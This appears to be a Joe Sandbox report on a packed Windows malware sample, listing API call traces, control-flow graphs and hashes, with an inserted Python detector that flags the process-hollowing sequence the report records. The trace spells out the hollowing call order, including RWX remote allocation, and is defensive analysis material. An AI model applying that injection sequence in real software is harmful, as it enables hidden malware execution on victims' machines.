                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:1.8%
                                                        Dynamic/Decrypted Code Coverage:47.9%
                                                        Signature Coverage:25.8%
                                                        Total number of Nodes:213
                                                        Total number of Limit Nodes:27

                                                        Control-flow Graph

                                                        APIs
                                                        • SetLastError.KERNEL32(00000000), ref: 00402B27
                                                        • DefineDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00402B4F
                                                        • _malloc.LIBCMT ref: 00402B56
                                                        • EnumResourceNamesW.KERNEL32(00000000,kokomaxojusokajucojafababoxosawolafufucawiyejuxewurifidaxegoladilahumipesovopog,00000000,00000000), ref: 00402B9B
                                                        • CoSuspendClassObjects.OLE32 ref: 00402BA1
                                                        • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00402BAC
                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,?,?,?), ref: 00402BC3
                                                        • OpenJobObjectW.KERNEL32(00000000,00000000,nawis), ref: 00402BD0
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00402BDA
                                                        • _ldexp.LIBCMT ref: 00402C01
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402C2F
                                                        • GetTickCount.KERNEL32 ref: 00402C45
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C87
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00402C8F
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402C9D
                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402CD5
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402CDD
                                                        • OpenEventW.KERNEL32(00000000,00000000,00000000), ref: 00402CE9
                                                        • GetCurrentProcess.KERNEL32 ref: 00402D0F
                                                        • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 00402D19
                                                        • GetLastError.KERNEL32 ref: 00402D34
                                                        • GetFileAttributesA.KERNEL32(sayemexesukayevudadotukawakebal), ref: 00402D85
                                                        • GetShortPathNameA.KERNEL32(jowalaserenadecibaf,?,00000000), ref: 00402D95
                                                        • GlobalCompact.KERNEL32(00000000), ref: 00402D99
                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402D9D
                                                        • SetComputerNameW.KERNEL32(zodow), ref: 00402DA8
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402DBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$ExchangeOpen$ErrorFreeLastName$AllocAttributesCharClassCompactComputerConsoleCountCurrentDecrementDefineDeviceDiskEnumEnvironmentEventFileGlobalHttpInputLibraryLoadNamesObjectObjectsPathProcessReadResourceShortSpaceStringStringsSuspendTickVirtualWidth32_ldexp_malloc
                                                        • String ID: Bq $`$tu$jowalaserenadecibaf$kokomaxojusokajucojafababoxosawolafufucawiyejuxewurifidaxegoladilahumipesovopog$nawis$sayemexesukayevudadotukawakebal$zodow${
                                                        • API String ID: 3256493818-1599021139
                                                        • Opcode ID: bf9affa40fc0374f3ca62506253b2e403d79d52b23fe62a2ec27c307109b290d
                                                        • Instruction ID: 27e7ae5b8b8d5546ca2e1133c51958c64e61e0f775f1a87b144f4ffeac6efbdd
                                                        • Opcode Fuzzy Hash: bf9affa40fc0374f3ca62506253b2e403d79d52b23fe62a2ec27c307109b290d
                                                        • Instruction Fuzzy Hash: 1F71D671900214BBD700AF64EE89F9A7778FB08305F11407AF545B71E0DAB86944CFAD

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00740156
                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0074016C
                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 00740255
                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00740270
                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00740283
                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0074029F
                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007402C8
                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007402E3
                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00740304
                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0074032A
                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00740399
                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007403BF
                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 007403E1
                                                        • ResumeThread.KERNELBASE(00000000), ref: 007403ED
                                                        • ExitProcess.KERNEL32(00000000), ref: 00740412
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                        • String ID:
                                                        • API String ID: 93872480-0
                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                        • Instruction ID: 8d536c9a11f34392e71dcdeeb797c813deb8bcb2b70e40e71d4d345bf600c66a
                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                        • Instruction Fuzzy Hash: 01B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D775AE41CF94
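The call list above, from the RWX region at 00740000 (CreateProcessA, Wow64GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx with protection 00000040, NtWriteVirtualMemory/WriteProcessMemory, Wow64SetThreadContext, ResumeThread), is the canonical process-hollowing sequence behind the report's "Injects a PE file into a foreign processes" signature. The Python below is an added example, not Joe Sandbox's or the sample's code: it parses API lines in the report's own "Name.Module(args), ref: addr" form and flags that ordered sequence. The hollowing trace it runs on is the injection-relevant part of the list above re-typed one call per line; the benign launcher trace, the stage table and the stage names are constructed for the example. The report shows the CreateProcessA arguments as "?", so the CREATE_SUSPENDED flag is not visible and the check does not rely on it.

```python
"""Flag a process-hollowing (RunPE) call sequence in a Joe Sandbox-style API list.
Added example for this report; not Joe Sandbox's or the sample's code.
Assumption: one "Api.Module(args), ref: addr" entry per line, in execution order."""
import re
from dataclasses import dataclass, field

# Injection-relevant calls of the 00740000 function, re-typed from this report.
HOLLOWING_TRACE = """\
CreateProcessA.KERNELBASE(?,00000000), ref: 00740255
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0074029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007402C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007402E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00740304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0074032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00740399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007403BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 007403E1
ResumeThread.KERNELBASE(00000000), ref: 007403ED
ExitProcess.KERNEL32(00000000), ref: 00740412
"""

# Constructed benign launcher trace (not from the report): spawn a child and wait for it.
BENIGN_TRACE = """\
CreateProcessA.KERNELBASE(?,00000000), ref: 00401000
WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00401010
CloseHandle.KERNEL32(00000000), ref: 00401020
"""

# Ordered stages of a hollowing sequence and the Win32/native names that perform each.
STAGES = (
    ("create",  {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW", "NtCreateUserProcess"}),
    ("get_ctx", {"GetThreadContext", "Wow64GetThreadContext", "NtGetContextThread"}),
    ("unmap",   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc",   {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"}),
    ("set_ctx", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
)
STAGE_INDEX = {name: i for i, (name, _) in enumerate(STAGES)}
REQUIRED = {"create", "write", "set_ctx", "resume"}   # get_ctx/unmap/alloc only corroborate
PAGE_EXECUTE_READWRITE = 0x40

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int

@dataclass
class Finding:
    verdict: str                                  # "process_hollowing" or "none"
    matched: dict = field(default_factory=dict)   # stage name -> first ApiCall matched
    indicators: list = field(default_factory=list)

def parse_trace(text: str) -> list:
    """Parse report-style call lines; a leading bullet is tolerated, other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip().lstrip("•").strip())
        if not m:
            continue
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

def detect_hollowing(text: str) -> Finding:
    """Match the stages in order; the first call seen for each stage is recorded."""
    matched, last_stage = {}, -1
    for call in parse_trace(text):
        for name, apis in STAGES:
            if call.api in apis:
                idx = STAGE_INDEX[name]
                if idx >= last_stage and name not in matched:   # enforce stage order
                    matched[name] = call
                    last_stage = idx
                break
    if not REQUIRED.issubset(matched):
        return Finding("none", matched)
    indicators = []
    if "unmap" in matched:
        indicators.append("target image unmapped via " + matched["unmap"].api)
    alloc = matched.get("alloc")
    # VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect): 5th arg is the protection
    if alloc and alloc.api == "VirtualAllocEx" and len(alloc.args) >= 5:
        try:
            if int(alloc.args[4], 16) == PAGE_EXECUTE_READWRITE:
                indicators.append("remote allocation is PAGE_EXECUTE_READWRITE")
        except ValueError:      # "?" means the sandbox could not resolve the value
            pass
    return Finding("process_hollowing", matched, indicators)
```

Ordering is what makes the check useful: WriteProcessMemory or SetThreadContext on their own are common in debuggers and instrumentation, but create, then write, then set context, then resume on the same sequence, with the original image unmapped and an RWX remote allocation in between, is what the 00740000 function does. The check does not verify that every call targets the same handle, since the report resolves most handle arguments to 00000000 or "?"; a trace with real handle values should add that constraint.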

                                                        Control-flow Graph

                                                        control_flow_graph 131 402de0-403111 132 403113-403118 131->132 133 403122-40312e call 402b10 132->133 134 40311a-403120 132->134 136 403133-40313e 133->136 134->132 134->133 137 403140-40314a 136->137 138 403157-40315a 137->138 139 40314c-403155 GetCurrentDirectoryA 137->139 138->137 140 40315c-403163 138->140 139->138
                                                        APIs
                                                        • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,432F6104,2B847A6C,5A8ECE52,6948C056,4A46582E,0865A1C9,5A8ECE52,4DEDD58E,7C6721A9,6C1250CB,242A0447,432F6104), ref: 00403155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: !,j.$.XFJ$E*O<$K(5$\d4&${F?=$0B
                                                        • API String ID: 1611563598-2896200284
                                                        • Opcode ID: 33589bf779dfdcfb32545bc6c93503069b8d1126e6440b162e61c231dbd6680e
                                                        • Instruction ID: 335b1c4ba61258370bd90e66255bd992d818689f95479903e01e551c08cd5c75
                                                        • Opcode Fuzzy Hash: 33589bf779dfdcfb32545bc6c93503069b8d1126e6440b162e61c231dbd6680e
                                                        • Instruction Fuzzy Hash: 20A1DAB9E01259CBCB04CFEAD98959DFBB4BF09318F608118E812BB615C3349A86CF55

                                                        Control-flow Graph

                                                        control_flow_graph 167 5f07a6-5f07bf 168 5f07c1-5f07c3 167->168 169 5f07ca-5f07d6 CreateToolhelp32Snapshot 168->169 170 5f07c5 168->170 171 5f07d8-5f07de 169->171 172 5f07e6-5f07f3 Module32First 169->172 170->169 171->172 177 5f07e0-5f07e4 171->177 173 5f07fc-5f0804 172->173 174 5f07f5-5f07f6 call 5f0465 172->174 178 5f07fb 174->178 177->168 177->172 178->173
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F07CE
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 005F07EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: ce13af51a5bc28e3279e9c9736f30fdf45294fe70e0ae3af8c6bcaa211608e82
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: ADF0C2311023196BD7203AB5A88CA7FBAE8FF49725F141168E742910C1DA78F8054A60

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                        • String ID:
                                                        • API String ID: 2477803136-0
                                                        • Opcode ID: 4aa17123169a9f647b61e8625abe71cb62d7366f6efa8d8edacce86b5bb3ce19
                                                        • Instruction ID: f2c74c07c22e1fedefcf420243682487841ead84586e024b1ab1f8ca8918139a
                                                        • Opcode Fuzzy Hash: 4aa17123169a9f647b61e8625abe71cb62d7366f6efa8d8edacce86b5bb3ce19
                                                        • Instruction Fuzzy Hash: B221A3B190070599EB14BF72A856B6F2AA89F0070EF1084BFF4157A1D2EA7C8A409B5D

                                                        Control-flow Graph

                                                        control_flow_graph 141 740420-7404f8 143 7404ff-74053c CreateWindowExA 141->143 144 7404fa 141->144 146 740540-740558 PostMessageA 143->146 147 74053e 143->147 145 7405aa-7405ad 144->145 148 74055f-740563 146->148 147->145 148->145 149 740565-740579 148->149 149->145 151 74057b-740582 149->151 152 740584-740588 151->152 153 7405a8 151->153 152->153 154 74058a-740591 152->154 153->148 154->153 155 740593-740597 call 740110 154->155 157 74059c-7405a5 155->157 157->153
                                                        APIs
                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00740533
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                        • API String ID: 716092398-2341455598
                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                        • Instruction ID: 4e4f94b8b99673d68e637f544da2430eeb8095da14c0705427ac574b79db9511
                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                        • Instruction Fuzzy Hash: 78512B70D08388DEEB11CBD8C849BDDBFB2AF15708F144058D5447F286C3BA5668CBA6

                                                        Control-flow Graph

                                                        control_flow_graph 158 7405b0-7405d5 159 7405dc-7405e0 158->159 160 7405e2-7405f5 GetFileAttributesA 159->160 161 74061e-740621 159->161 162 7405f7-7405fe 160->162 163 740613-74061c 160->163 162->163 164 740600-74060b call 740420 162->164 163->159 166 740610 164->166 166->163
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007405EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID: apfHQ$o
                                                        • API String ID: 3188754299-2999369273
                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                        • Instruction ID: f6166cd23224ffbf77b2cc31e6bbee5d3e4099575cce5e00e65eb9df6328bd24
                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                        • Instruction Fuzzy Hash: 5A011E70C0424CEADB10DBA8C5187AEBFB5AF41308F148099C5592B242D77A9B58CBA2

                                                        Control-flow Graph

                                                        control_flow_graph 180 40267c-402700 181 402702-40270e 180->181 182 402755-4027b4 LoadLibraryW 180->182 181->182
                                                        APIs
                                                        • LoadLibraryW.KERNELBASE(00466600,00402DCE), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: ed66df7c64455e5a93cd2ef8fb96cd029c232b4aa1285a2612a9f6c6703a7a44
                                                        • Instruction ID: 717ac444619ad65d5af4e7808bc2cc9c817e03435d1a66de99cca7db7c4f39a4
                                                        • Opcode Fuzzy Hash: ed66df7c64455e5a93cd2ef8fb96cd029c232b4aa1285a2612a9f6c6703a7a44
                                                        • Instruction Fuzzy Hash: 8AF074246193808AD7029F74FA253413771EF6A740F0694BAD049CB2B2F2F95955C76F

                                                        Control-flow Graph

                                                        control_flow_graph 183 402720-4027b4 LoadLibraryW
                                                        APIs
                                                        • LoadLibraryW.KERNELBASE(00466600,00402DCE), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 1a5211a52cd68e27f45746e73ddd9ed22603c5be81d4bc0dbf80c7ae03022757
                                                        • Instruction ID: 8a9a43746511672b4a0ee73f11dc87a61e4bb3563de9bf10a7e3a9da5911af9a
                                                        • Opcode Fuzzy Hash: 1a5211a52cd68e27f45746e73ddd9ed22603c5be81d4bc0dbf80c7ae03022757
                                                        • Instruction Fuzzy Hash: 93F06214628240C6E704DF65FA117112226EF68700F12A43AD109CB7B4F6FA8A55C76F

                                                        Control-flow Graph

                                                        control_flow_graph 185 4054fc-40551e HeapCreate 186 405520-405521 185->186 187 405522-40552b 185->187
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00405511
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: 13a260a0a604567778b8c9f6304527e465eef30763dfe8667c31d4132a2fb43a
                                                        • Instruction ID: 0a9147f93b69d693ed341cec57dc28b6a389ab133384bf297220524970fa77db
                                                        • Opcode Fuzzy Hash: 13a260a0a604567778b8c9f6304527e465eef30763dfe8667c31d4132a2fb43a
                                                        • Instruction Fuzzy Hash: 49D05E369543486EEB005FB57D087663BECD384795F008477F90EC6590F574C9408A08

                                                        Control-flow Graph

                                                        control_flow_graph 188 5f0465-5f049f call 5f0778 191 5f04ed 188->191 192 5f04a1-5f04d4 VirtualAlloc call 5f04f2 188->192 191->191 194 5f04d9-5f04eb 192->194 194->191
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005F04B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 4b3b82a961298218d86c1796e32c64b7e5f876bbfa977958dd870988312921ef
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: 7C112079A40208EFDB01DF98C985E98BFF5AF08351F058094FA489B362D375EA50DF40
                                                        APIs
                                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0040286F
                                                        • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 004028B4
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,gosiyoruvazaligusa lejivo hutawucadajira,00000000,?,00000000), ref: 004028E1
                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 004028EC
                                                        • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004028FF
                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00402910
                                                        • ClearCommBreak.KERNEL32(00000000), ref: 00402918
                                                        • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00402924
                                                        • GetTempFileNameW.KERNEL32(00000000,?,00000000,00000000), ref: 00402937
                                                        • IsBadCodePtr.KERNEL32(00000000), ref: 0040293F
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402951
                                                        • GetVersionExW.KERNEL32(?), ref: 0040295E
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402968
                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 0040297E
                                                        • GlobalMemoryStatus.KERNEL32(00000000), ref: 00402986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CommFileNameVersion$AttributesBreakClearCodeComputerConfigConsoleDriveEnumFormatFormatsGlobalIncrementInfoInputInterlockedLogicalMemoryMountNumberPointReadStatusStringsTempTimeVerifyVolume
                                                        • String ID: $gosiyoruvazaligusa lejivo hutawucadajira
                                                        • API String ID: 1733047232-2210585140
                                                        APIs
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402A3F
                                                        • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00402A45
                                                        • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00402A54
                                                        • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A6A
                                                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00402A74
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A8E
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402AA0
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00402AA8
                                                        • TlsGetValue.KERNEL32(00000000), ref: 00402AAC
                                                        • SetEnvironmentVariableA.KERNEL32(00000000,?), ref: 00402ABB
